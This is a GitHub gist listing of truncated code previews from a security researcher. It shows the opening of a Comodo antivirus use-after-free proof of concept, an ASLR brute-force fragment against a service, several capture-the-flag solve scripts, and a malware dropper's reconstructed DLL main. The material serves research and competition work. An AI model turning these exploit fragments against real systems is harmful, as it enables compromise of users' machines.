Souhail Hammou SouhailHammou
SouhailHammou
/ comodo_av_uaf_poc.c
Created
August 13, 2019 15:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #define NTHREADS 5 | |
| DWORD WINAPI Thread(LPVOID Parameter) | |
| { | |
| while (1) | |
| CloseHandle(FindFirstChangeNotificationA("C:\\", FALSE, FILE_NOTIFY_CHANGE_FILE_NAME)); | |
| } | |
| void main() | |
| { | |
| HANDLE hLastThread; |
SouhailHammou
/ Vp_ASLR_bf.c
Last active
February 6, 2019 00:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pid = /*Locate the service's pid with the help of NtQuerySystemInformation*/; | |
| for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 ) | |
| { | |
| Page_cp = Page; | |
| OldProtection = CommunicateServiceVirtualProtect( | |
| pid, //We give the service its own pid | |
| Page, //Address of the page in the service's process | |
| PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes | |
| 0x1000 | |
| ); |
SouhailHammou
/ bruteforce.c
Created
October 5, 2018 23:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <string.h> | |
| #define SUMS_SZ 0x10000 * sizeof(int16_t) | |
| #define VM_SZ sizeof(initial_state) | |
| typedef int16_t WORD; |
SouhailHammou
/ kvm_solve.py
Created
September 16, 2018 20:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from idc import * | |
| root = 0x1300 | |
| flag = '' | |
| def tobits(s): | |
| result = [] | |
| for c in s: | |
| bits = bin(ord(c))[2:] | |
| bits = '00000000'[len(bits):] + bits |
SouhailHammou
/ ida_solve.py
Last active
November 19, 2017 13:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # HXP CTF 2017 - revenge_of_the_zwiebel 100 pts | |
| # Writeup link : https://rce4fun.blogspot.com/2017/11/hxp-ctf-2017-revengeofthezwiebel.html | |
| # Souhail Hammou | |
| from idc import * | |
| from idaapi import * | |
| def AddIfNotInDict(dict,index): | |
| if index == -1: | |
| raise Exception("Invalid index value !") |
SouhailHammou
/ go_solve.py
Last active
November 19, 2017 12:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #HXP CTF 2017 - dont_panic 100 pts | |
| #Writeup link : https://rce4fun.blogspot.com/2017/11/hxp-ctf-2017-dontpanic-reversing-100.html | |
| #Souhail Hammou | |
| import gdb | |
| CHAR_SUCCESS = 0x47B976 | |
| NOPE = 0x47BA23 | |
| gdb.execute("set pagination off") | |
| gdb.execute("b*0x47B976") #Success for a given character | |
| gdb.execute("b*0x47BA23") #Block displaying "Nope" |
SouhailHammou
/ solve.c
Last active
November 19, 2017 12:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Souhail Hammou | |
| HXP CTF 2017 - Fibonacci 100 pts | |
| Writeup : https://rce4fun.blogspot.com/2017/11/hxp-ctf-2017-fibonacci-reversing-100.html | |
| */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #define _BYTE unsigned char | |
| #define BYTEn(x, n) (*((_BYTE*)&(x)+n)) |
SouhailHammou
/ Crackme_RCTF_2017.c
Created
May 22, 2017 10:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| RCTF - 2017 | |
| Author : SOUHAIL HAMMOU | |
| Crackme 714 pts (9 solves) | |
| Description : | |
| ============ | |
| Please submit the flag like RCTF{flag} | |
| https://static2017.teamrois.cn/re_b889ffe02c96c38274f76c67f8a1ddf3/crackme_63074830f0b1b6b4fff6ad910bea34fc.zip | |
| */ |
SouhailHammou
/ ndh2017_step4.py
Last active
May 15, 2023 17:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from idc import * | |
| from ctypes import c_uint32 | |
| def bruteforce_word(dword1,dword2): | |
| for i in range(0,256) : | |
| for j in range(0,256) : | |
| k = 0 | |
| result = c_uint32(0xffffffff) | |
| while k < 2 : | |
| if k == 0 : |
SouhailHammou
/ Avtr_dllmain.c
Created
March 28, 2017 18:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*2nd level dropper : DLL main function*/ | |
| { | |
| /*[...]*/ | |
| pavtr_listelem Elem = gList; | |
| while ( Elem != NULL ) | |
| { | |
| HANDLE hThread = CreateThread(NULL,NULL,Avtr_ThreadProc,Elem,0); | |
| if ( ! hThread ) | |
| break; |
NewerOlder